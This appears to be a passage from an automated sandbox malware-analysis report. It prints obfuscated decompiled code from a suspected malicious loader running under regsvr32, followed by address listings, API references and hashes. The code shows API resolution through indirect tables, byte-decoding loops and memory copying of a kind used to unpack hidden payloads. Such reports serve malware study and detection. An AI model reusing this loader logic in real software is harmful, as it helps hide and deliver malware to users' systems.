				if( *(_t493 + 0x4356f5) == 0) {
					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
					_t504 = _t504;
				}
				_push(_a4);
				_pop( *_t53);
				_push(_v12);
				_pop(_t626);
				if( *(_t493 + 0x4358dc) == 0) {
					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
					_v16 = _t584;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
					if( *(_t493 + 0x435268) == 0) {
						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
						_t567 = _t567;
						_t477 =  *_t672;
						_t672 =  &(_t672[1]);
					}
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
					_t626 = _t626;
				}
				_v12 = _t504;
				_t585 = 0 ^ _a8;
				_t507 = _v12;
				if( *(_t493 + 0x435675) == 0) {
					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
					_t507 = _t507;
				}
				if( *(_t493 + 0x435732) == 0) {
					if( *(_t493 + 0x435142) == 0) {
						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
						_v16 = _t626;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
						_t626 = _v16;
					}
					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
					_v20 = _t507;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
						_push(_v12);
						_pop( *_t115);
					}
				}
				_push( *((intOrPtr*)(_t626 + 8)));
				if( *(_t493 + 0x435898) == 0) {
					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
					_v12 = _t585;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
					_t585 = _v12;
				}
				_push(_t585);
				if( *(_t493 + 0x4358d8) == 0) {
					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
					 *_t672 = _t567;
					 *(_t493 + 0x4358d8) = 0 ^ _t466;
					_t567 = 0;
				}
				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
					if( *(_t493 + 0x4355f9) == 0) {
						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
						_t585 = _t585;
					}
					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
						_push(_v16);
						_pop( *_t145);
						_t462 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t146 = _t462;
					_push(_v16);
					_pop( *_t148);
				}
				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
				_push(_v12);
				_t509 =  &_v20;
				_t660 = _t657;
				_push(_t509);
				if( *(_t493 + 0x4359bd) == 0) {
					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
					_v20 = _t509;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
					_t509 = (_v20 & 0x00000000) +  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_t627 = _t626 +  *_t626;
				if( *(_t493 + 0x4357f2) == 0) {
					_push(_t509);
					if( *(_t493 + 0x4355bd) == 0) {
						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
						_v16 = _t627;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
						_t627 = _v16;
					}
					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
					_push(0xc);
					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
						 *_t672 = _t627;
						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
						_t627 = 0;
					}
					_push( *((intOrPtr*)(_t493 + 0x435346)));
					if( *(_t493 + 0x435815) == 0) {
						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
						_t627 = _t627;
					}
					_push(0x2e);
					_push( *((intOrPtr*)(_t493 + 0x435a19)));
					if( *(_t493 + 0x435a09) == 0) {
						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
						_v12 = _t509;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
						_t509 = _v12;
					}
					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
					if( *(_t493 + 0x4359dd) == 0) {
						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
						_t509 = _t509;
						_pop( *_t207);
						_t451 = _v12;
					}
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
					_t660 = _t660;
					_t509 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				do {
					asm("movsb");
					_t509 = _t509 - 1;
				} while (_t509 != 0);
				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
				_t512 = _t509;
				if( *(_t493 + 0x4355d5) == 0) {
					_push(_t493 + 0x435736);
					if( *(_t493 + 0x4352bf) == 0) {
						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
						_t585 = _t585;
					}
					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
					_push(_t585);
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
					if( *(_t493 + 0x435264) == 0) {
						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
						_v12 = _t567;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
						_t567 = _v12;
					}
				}
				_pop( *_t243);
				_t514 = _t512 & 0x00000000 ^ _v20;
				if( *(_t493 + 0x4359ed) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
					_t660 = _t660;
					_t514 =  *_t672;
					_t672 =  &(_t672[1]);
				}
				_t587 =  *_t672;
				_t673 =  &(_t672[1]);
				if( *(_t493 + 0x4351b7) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
					_v16 = _t514;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
					_pop( *_t261);
					_t514 = _v16;
				}
				_v12 = _t421;
				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
				_push(_t493);
				do {
					_t425 =  *_t629 & 0x000000ff;
					_t629 = _t629 + 1;
					if(_t425 == 0) {
						goto L64;
					}
					_push(_t514);
					 *_t673 = 1;
					_t515 = _t629;
					 *_t266 = _t629;
					_push(_v20);
					_pop(_t567);
					_v8 = 8;
					do {
						asm("rol eax, cl");
						_t495 = _t425;
						_t425 = _t567;
						asm("ror ebx, cl");
						_t269 =  &_v8;
						 *_t269 = _v8 - 1;
					} while ( *_t269 != 0);
					 *_t673 = _t515;
					_t425 = _t495;
					 *_t271 = 0;
					_t514 = 0 ^ _v12;
					L64:
					asm("stosb");
					_t514 = _t514 - 1;
				} while (_t514 != 0);
				_pop( *_t273);
				_t497 = 0 ^ _v12;
				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
					 *_t279 = _t425;
					_push(_v12);
					_pop( *_t281);
				}
				if( *(_t497 + 0x435122) == 0) {
					_t283 = _t497 + 0x435182; // 0x435182
					if( *(_t497 + 0x4357e2) == 0) {
						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
						_v12 = _t587;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
						_t587 = _v12;
					}
					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
					_v20 = _t567;
					 *(_t497 + 0x435122) = _t425;
					_t567 = _v20;
					if( *(_t497 + 0x4354ca) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
						 *_t673 = _t660;
						 *(_t497 + 0x4354ca) = _t425;
						_t660 = 0;
					}
				}
				if(_a4 != 0) {
					if( *(_t497 + 0x435250) == 0) {
						_t303 = _t497 + 0x4358c0; // 0x4358c0
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
						 *_t673 = _t629;
						 *(_t497 + 0x435250) = 0 ^ _t425;
						_t629 = 0;
					}
					if(_a8 != 0) {
						if( *(_t497 + 0x435213) == 0) {
							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
							_t587 = _t587;
						}
						_t425 = E00781C5D(_t497, _t514, _t567, _t629, _a8, _a4);
					}
				}
				_pop( *_t315);
				_t568 = _v20;
				if( *(_t497 + 0x4352f3) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
					_push(_t514);
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
					_t568 =  *_t673;
					_t673 = _t673 - 0xfffffffc;
				}
				if(_t568 > 0) {
					if( *(_t497 + 0x4354b6) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
						_v12 = _t587;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
					}
					_push(_a4);
					_pop( *_t339);
					_push(_v16);
					_pop(_t590);
					_push(_t590);
					 *_t673 = _t629;
					_t520 =  *(_t590 + 4);
					_t634 = 0;
					if( *(_t497 + 0x4350bc) == 0) {
						_t343 = _t497 + 0x4355b5; // 0x4355b5
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
						_push(0);
						 *_t673 = _t660;
						 *(_t497 + 0x4350bc) = 0 ^ _t425;
						_t520 =  *_t673;
						_t673 =  &(_t673[1]);
					}
					_v16 = _t497;
					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
					_t500 = _v16;
					if( *(_t500 + 0x435659) == 0) {
						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
						_v12 = _t590;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
						_t590 = _v12;
						 *_t357 = _t520;
						_t520 = _t520 & 0x00000000 ^ _v12;
						 *_t359 = _t427;
						_t427 = _v16;
					}
					_push(_t520);
					_push(_t520);
					_v16 = _t634;
					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
					_t637 = _v16;
					if( *(_t500 + 0x4353fa) == 0) {
						_t365 = _t500 + 0x43595c; // 0x43595c
						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
						_v16 = _t590;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
						_t590 = _v16;
						_t570 = (_t570 & 0x00000000) +  *_t673;
						_t673 = _t673 - 0xfffffffc;
					}
					_v16 = _t520;
					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
					_push( *_t673);
					 *_t673 =  *_t673 - _t570;
					_pop(_t525);
					if( *(_t500 + 0x435984) == 0) {
						_t379 = _t500 + 0x435829; // 0x435829
						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
						_t590 = _t590;
						_t570 =  *_t673;
						_t673 = _t673 - 0xfffffffc;
						 *_t385 = _t379;
						_t525 = _t525 & 0x00000000 | _v12;
					}
					_t640 = _t639 + _t525;
					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
					_t503 = _t500;
					if( *(_t503 + 0x43579a) == 0) {
						_t389 = _t503 + 0x4359c1; // 0x4359c1
						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
						_v16 = _t527;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
						 *_t397 = _t389;
						_t570 = _t570 & 0x00000000 | _v12;
						 *_t399 = _t570;
						_t527 = _v20;
					}
					memcpy(_t590, _t640, _t527);
					_t676 =  &(_t673[3]);
					_t592 = _t640 + _t527 + _t527;
					_push(_a8);
					_pop( *_t402);
					_push(_v20);
					_pop(_t641);
					if( *(_t503 + 0x4352b7) == 0) {
						_t405 = _t503 + 0x435237; // 0x435237
						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
						_v20 = _t641;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
						_t641 = _v20;
						_t570 =  *_t676;
						_t676 = _t676 - 0xfffffffc;
					}
					_t677 = _t676 - 0xfffffffc;
					_push(0 ^  *_t676);
					 *_t677 =  *_t677 - _t570;
					_pop(_t531);
					_t429 = memcpy(_t592, _t641, _t531);
					_t678 = _t677 + 0xc;
					 *_t414 = _t429;
					_t629 =  *_t678;
					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
					_t673 =  &(_t678[4]);
					_t587 = _t629 + (0 | _v12) + (0 | _v12);
				}
				return _t425;
			}

















































































                            0x00783726
                            0x00783726
                            0x00783726
                            0x00783726
                            0x00783726
                            0x00783733
                            0x0078373b
                            0x00783743
                            0x00783746
                            0x00783749
                            0x00783749
                            0x0078374f
                            0x0078375c
                            0x00783766
                            0x0078376e
                            0x00783775
                            0x0078377b
                            0x0078377e
                            0x00783781
                            0x00783781
                            0x00783784
                            0x00783785
                            0x00783792
                            0x00783795
                            0x0078379b
                            0x007837a3
                            0x007837aa
                            0x007837b0
                            0x007837b5
                            0x007837b8
                            0x007837b8
                            0x007837c3
                            0x007837c6
                            0x007837c9
                            0x007837d6
                            0x007837e5
                            0x007837e8
                            0x007837eb
                            0x007837eb
                            0x007837f1
                            0x007837f9
                            0x007837fb
                            0x00783808
                            0x00783818
                            0x0078381b
                            0x0078381e
                            0x0078382a
                            0x0078382d
                            0x0078382d
                            0x00783838
                            0x0078383b
                            0x0078383e
                            0x0078383e
                            0x00783844
                            0x0078384c
                            0x0078385a
                            0x00783866
                            0x0078386d
                            0x00783873
                            0x00783873
                            0x00783874
                            0x00783877
                            0x0078387a
                            0x0078387d
                            0x00783885
                            0x00783895
                            0x0078389b
                            0x007838a3
                            0x007838aa
                            0x007838b3
                            0x007838c0
                            0x007838c9
                            0x007838d5
                            0x007838dc
                            0x007838e2
                            0x007838e5
                            0x007838e8
                            0x007838e8
                            0x007838f1
                            0x007838f8
                            0x007838fe
                            0x007838fe
                            0x007838ff
                            0x00783907
                            0x00783909
                            0x00783913
                            0x0078391c
                            0x00783928
                            0x0078392f
                            0x00783935
                            0x00783935
                            0x0078393d
                            0x0078394a
                            0x0078394c
                            0x00783952
                            0x0078395a
                            0x00783961
                            0x00783967
                            0x00783967
                            0x0078396a
                            0x00783970
                            0x00783978
                            0x0078397f
                            0x0078398f
                            0x007839bd
                            0x007839c0
                            0x007839c3
                            0x007839c3
                            0x0078398f
                            0x007839c9
                            0x007839d3
                            0x007839dc
                            0x007839e2
                            0x007839ea
                            0x007839f1
                            0x007839f7
                            0x007839f7
                            0x007839fa
                            0x00783a02
                            0x00783a06
                            0x00783a0e
                            0x00783a15
                            0x00783a1b
                            0x00783a1b
                            0x00783a23
                            0x00783a2c
                            0x00783a30
                            0x00783a3c
                            0x00783a43
                            0x00783a49
                            0x00783a49
                            0x00783a4c
                            0x00783a59
                            0x00783a81
                            0x00783a84
                            0x00783a87
                            0x00783a8f
                            0x00783a92
                            0x00783a92
                            0x00783a96
                            0x00783a99
                            0x00783a9c
                            0x00783a9c
                            0x00783aa8
                            0x00783aab
                            0x00783ab8
                            0x00783aba
                            0x00783abb
                            0x00783ac3
                            0x00783acd
                            0x00783ad3
                            0x00783adb
                            0x00783ae2
                            0x00783af1
                            0x00783af4
                            0x00783af4
                            0x00783af7
                            0x00783b00
                            0x00783b06
                            0x00783b0e
                            0x00783b17
                            0x00783b1d
                            0x00783b25
                            0x00783b2c
                            0x00783b32
                            0x00783b32
                            0x00783b35
                            0x00783b3b
                            0x00783b44
                            0x00783b4d
                            0x00783b55
                            0x00783b5c
                            0x00783b62
                            0x00783b62
                            0x00783b63
                            0x00783b70
                            0x00783b7a
                            0x00783b86
                            0x00783b8d
                            0x00783b93
                            0x00783b93
                            0x00783b94
                            0x00783b96
                            0x00783ba3
                            0x00783bb1
                            0x00783bb7
                            0x00783bbf
                            0x00783bc6
                            0x00783bcc
                            0x00783bcc
                            0x00783bdb
                            0x00783be8
                            0x00783bf2
                            0x00783bfe
                            0x00783c05
                            0x00783c0b
                            0x00783c0c
                            0x00783c0f
                            0x00783c0f
                            0x00783c18
                            0x00783c1f
                            0x00783c25
                            0x00783c2c
                            0x00783c2f
                            0x00783c2f
                            0x00783c32
                            0x00783c32
                            0x00783c33
                            0x00783c33
                            0x00783c44
                            0x00783c50
                            0x00783c57
                            0x00783c5d
                            0x00783c65
                            0x00783c6d
                            0x00783c75
                            0x00783c7e
                            0x00783c8a
                            0x00783c91
                            0x00783c97
                            0x00783c97
                            0x00783c98
                            0x00783c9e
                            0x00783ca4
                            0x00783cab
                            0x00783cb9
                            0x00783cc2
                            0x00783cc8
                            0x00783cd0
                            0x00783cd7
                            0x00783cdd
                            0x00783cdd
                            0x00783cb9
                            0x00783ce6
                            0x00783ce9
                            0x00783cf3
                            0x00783cf6
                            0x00783d02
                            0x00783d09
                            0x00783d0f
                            0x00783d12
                            0x00783d15
                            0x00783d15
                            0x00783d1a
                            0x00783d1d
                            0x00783d27
                            0x00783d30
                            0x00783d36
                            0x00783d3e
                            0x00783d45
                            0x00783d50
                            0x00783d53
                            0x00783d53
                            0x00783d56
                            0x00783d61
                            0x00783d66
                            0x00783d67
                            0x00783d67
                            0x00783d6a
                            0x00783d6d
                            0x00000000
                            0x00000000
                            0x00783d6f
                            0x00783d71
                            0x00783d78
                            0x00783d7f
                            0x00783d82
                            0x00783d85
                            0x00783d86
                            0x00783d8d
                            0x00783d8d
                            0x00783d8f
                            0x00783d91
                            0x00783d93
                            0x00783d95
                            0x00783d95
                            0x00783d95
                            0x00783d9c
                            0x00783da3
                            0x00783da8
                            0x00783dab
                            0x00783dae
                            0x00783dae
                            0x00783daf
                            0x00783daf
                            0x00783db4
                            0x00783db7
                            0x00783dc1
                            0x00783dcf
                            0x00783dd6
                            0x00783dd9
                            0x00783ddc
                            0x00783ddc
                            0x00783de9
                            0x00783deb
                            0x00783df9
                            0x00783e01
                            0x00783e07
                            0x00783e0f
                            0x00783e16
                            0x00783e1c
                            0x00783e1c
                            0x00783e1f
                            0x00783e25
                            0x00783e2c
                            0x00783e32
                            0x00783e3c
                            0x00783e3e
                            0x00783e46
                            0x00783e4d
                            0x00783e53
                            0x00783e53
                            0x00783e3c
                            0x00783e58
                            0x00783e61
                            0x00783e63
                            0x00783e6a
                            0x00783e72
                            0x00783e79
                            0x00783e7f
                            0x00783e7f
                            0x00783e84
                            0x00783e8d
                            0x00783e8f
                            0x00783e9b
                            0x00783ea2
                            0x00783ea8
                            0x00783ea8
                            0x00783eaf
                            0x00783eaf
                            0x00783e84
                            0x00783eb4
                            0x00783eb7
                            0x00783ec1
                            0x00783eca
                            0x00783ed0
                            0x00783ed6
                            0x00783edd
                            0x00783eea
                            0x00783eed
                            0x00783eed
                            0x00783ef3
                            0x00783f00
                            0x00783f27
                            0x00783f2d
                            0x00783f35
                            0x00783f3c
                            0x00783f42
                            0x00783f45
                            0x00783f48
                            0x00783f4b
                            0x00783f4e
                            0x00783f4f
                            0x00783f52
                            0x00783f5a
                            0x00783f5c
                            0x00783f64
                            0x00783f67
                            0x00783f6e
                            0x00783f74
                            0x00783f76
                            0x00783f7d
                            0x00783f86
                            0x00783f89
                            0x00783f89
                            0x00783f8c
                            0x00783f98
                            0x00783f9a
                            0x00783fa4
                            0x00783fa8
                            0x00783fae
                            0x00783fb6
                            0x00783fbd
                            0x00783fc3
                            0x00783fcc
                            0x00783fcf
                            0x00783fd2
                            0x00783fd5
                            0x00783fd5
                            0x00783fd8
                            0x00783fd9
                            0x00783fda
                            0x00783fe5
                            0x00783fe7
                            0x00783ff1
                            0x00783ff4
                            0x00783ffb
                            0x00784001
                            0x00784009
                            0x00784010
                            0x00784016
                            0x0078401f
                            0x00784022
                            0x00784022
                            0x00784025
                            0x00784031
                            0x00784039
                            0x0078403a
                            0x0078403d
                            0x00784045
                            0x00784049
                            0x00784050
                            0x0078405c
                            0x00784063
                            0x00784069
                            0x0078406c
                            0x0078406f
                            0x00784078
                            0x0078407b
                            0x0078407b
                            0x0078407e
                            0x0078408a
                            0x0078408c
                            0x00784094
                            0x00784098
                            0x0078409f
                            0x007840a5
                            0x007840ad
                            0x007840b4
                            0x007840c3
                            0x007840c6
                            0x007840cb
                            0x007840ce
                            0x007840ce
                            0x007840d1
                            0x007840d1
                            0x007840d1
                            0x007840d3
                            0x007840d6
                            0x007840d9
                            0x007840dc
                            0x007840e4
                            0x007840e7
                            0x007840ee
                            0x007840f4
                            0x007840fc
                            0x00784103
                            0x00784109
                            0x0078410e
                            0x00784111
                            0x00784111
                            0x00784119
                            0x0078411c
                            0x0078411d
                            0x00784120
                            0x00784121
                            0x00784121
                            0x00784136
                            0x0078413e
                            0x00784144
                            0x00784144
                            0x00784144
                            0x00784144
                            0x0078415f

                            APIs
                            • OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 00783811
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                            • Instruction ID: 00269cb71a8345197c2fa7e638e8a6226c920d1e7aa6f2051e3d0451c7034a23
                            • Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                            • Instruction Fuzzy Hash: D8624D72900604EFFF049FA4C889B9A7BB5FF24321F0851A9ED1D9E099D77815A4CF68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0078242A, Relevance: 2.1, APIs: 1, Instructions: 592memoryCOMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E0078242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
				signed int _v8;
				signed int _v12;
				signed int _t337;
				signed int _t339;
				void* _t346;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				void* _t364;
				void* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t374;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				signed int _t388;
				signed int _t391;
				signed int _t392;
				signed int _t394;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t404;
				signed int _t405;
				signed int _t408;
				signed int _t409;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed int _t423;
				signed int _t428;
				signed int _t431;
				signed int _t433;
				signed int _t454;
				signed int _t457;
				signed int _t479;
				signed int _t481;
				signed int _t484;
				void* _t486;
				signed int _t489;
				void* _t492;
				signed int _t500;
				signed int _t503;
				void* _t516;
				signed int _t523;
				signed int _t526;
				signed int _t529;
				void* _t531;
				signed int _t562;
				void* _t565;
				void* _t568;
				signed int* _t571;
				signed int* _t572;
				signed int* _t574;
				signed int* _t575;

				_t523 = __esi;
				_t479 = __edi;
				_t450 = __edx;
				_t426 = __ecx;
				_t417 = __ebx;
				if( *(__ebx + 0x4351c7) == 0) {
					_push(__ecx);
					_push(__edx);
					_push(__ebx + 0x4351ef);
					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_v12 = __edx;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
					_pop( *_t11);
					_t450 = _v12 & 0x00000000 ^ _v12;
					_pop( *_t13);
					_t426 = __ecx & 0x00000000 | _v12;
				}
